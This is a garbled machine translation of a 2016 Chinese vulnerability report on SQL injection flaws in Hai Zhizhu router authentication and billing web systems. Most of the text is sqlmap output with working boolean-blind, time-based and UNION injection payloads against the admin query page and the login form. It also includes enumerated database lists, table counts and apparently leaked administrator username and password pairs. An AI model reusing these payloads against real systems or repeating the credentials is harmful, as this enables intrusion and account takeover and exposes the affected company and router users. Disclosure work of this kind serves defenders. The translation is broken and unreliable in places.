漏洞标题 wifi安全之海蜘蛛多处SQL注入打包(影响大量路由器) 相关厂商 武汉海蜘蛛网络科技有限公司 漏洞作者 千机 提交时间 2016-05-11 13:10 公开时间 2016-06-27 1…
漏洞标题
Wifi安全海蜘蛛多个SQL注入包装(影响大量路由器)
相关制造商
武汉海蜘蛛网络科技有限公司
漏洞作者
千机
提交时间
2016-05-11 13: 10
公共时间
2016-06-27 18: 20
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
20
漏洞状态
已提交给第三方合作机构(cncert National Internet Emergency Center)
标签标签
Mysql的
漏洞详细信息
https://**。**。**。**/demo.htm
这似乎是一个演示演示站点,它为身份验证计费系统演示地址提供了一个后台登录密码。
所以进去看看,我发现了sql注入
注入存在于查询用户处
http://**。**。**。**: 80/admin.php/User/index/texttype/username/text/11 *(GET)
---
参数:#1 *(URI)
输入:基于布尔值的盲
标题: AND基于布尔的盲 - WHERE或H * ING子句
有效载荷:http://**。**。**。**: 80/admin.php /用户/索引/文本类型/用户名/文本/11%'和1088=1088 AND'%'='
输入:和/或基于时间的盲
标题: MySQL>=5.0.12 AND基于时间的盲(SELECT)
有效载荷:http://**。**。**。**: 80/admin.php /用户/索引/文本类型/用户名/文本/11%'和(SELECT * FROM(SELECT(SLEEP(5)))RkuO) AND'%'='
键入: UNION查询
标题:通用UNION查询(NULL) - 15列
有效载荷:http://**。**。**。**: 80/admin.php /用户/索引/文本类型/用户名/文本/11%'UNION ALL SELECT NULL,CONCAT(0x71706a7774a7a486c52635342455759514b6e595149494a514d63586c4f47624c494e5344574b51,0x716a6b6271),NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -
---
后端DBMS: MySQL 5.0.12
横幅:'5.1.45'
受影响的5个数据库,root权限,shell没有成功。
可用数据库[5]:
[*] bak
[*] information_schema
[*] mysql
[*]半径
[*]测试
此查询还有一个注入。

这个背景应该注入很多。找到两个并找到它。其他自我检查
海蜘蛛路由信息系统
http://**。**。**。**/index.php /登录
登录时存在Sql注入
http://**。**。**。**: 80/index.php /登录/checkLogin(POST)
名称=管理和放大器;密码=管理员和放大器;验证=3832
Sqlmap从存储的会话:恢复以下注入点
---
参数:名称(POST)
输入:和/或基于时间的盲
标题: MySQL>=5.0.12 AND基于时间的盲(SELECT)
有效载荷:名称=admin'AND(SELECT * FROM(SELECT(SLEEP(5)))kdKR)AND'AYDD'='AYlD& password=admin& verify=3832
---
Web应用程序技术: PHP 5.2.17
后端DBMS: MySQL 5.0.12
当前数据库:'hsrouter'
Sqlmap从存储的会话:恢复以下注入点
---
参数:名称(POST)
输入:和/或基于时间的盲
标题: MySQL>=5.0.12 AND基于时间的盲(SELECT)
有效载荷:名称=admin'AND(SELECT * FROM(SELECT(SLEEP(5)))kdKR)AND'AYDD'='AYlD& password=admin& verify=3832
---
影响19个数据库
[*] bak
[*] bak2
[*] bak_operate
[*] forumx2
[*] hs_spider
[*] hsrouter
[*] hsrouterinfo
[*] information_schema
[*]彩票
[*] my_wiki
[*] mysql
[*]运作
[*]半径
[*] radiuscloud
[*]注册
[*]测试
[*] tipask
[*] tomreport
[*] ucenter
Radius是刚才身份验证计费系统的数据库。
维基应该是内部维基的数据库
UCenter应该是bbs数据库。
当前数据库是hsrouter
数据库: hsrouter
+ ---------- + --------- +
|表|参赛作品|
+ ---------- + --------- +
|注册| 117962 |
|试试| 7732 |
| try_max | 624 |
| host_max | 576 |
|工业| 33 |
| `user` | 2 |
+ ---------- + --------- +
11w这不知道它是否是路由器的数量
密码存在于用户表中,并读取数据。
帐户密码是
Thx 123456
Hispider hzz123456

9941在线路由器。
泄露号码ip和地址

漏洞证明:

修理计划:
改变和改变
版权声明:请注明出处。成千上万的机器@乌云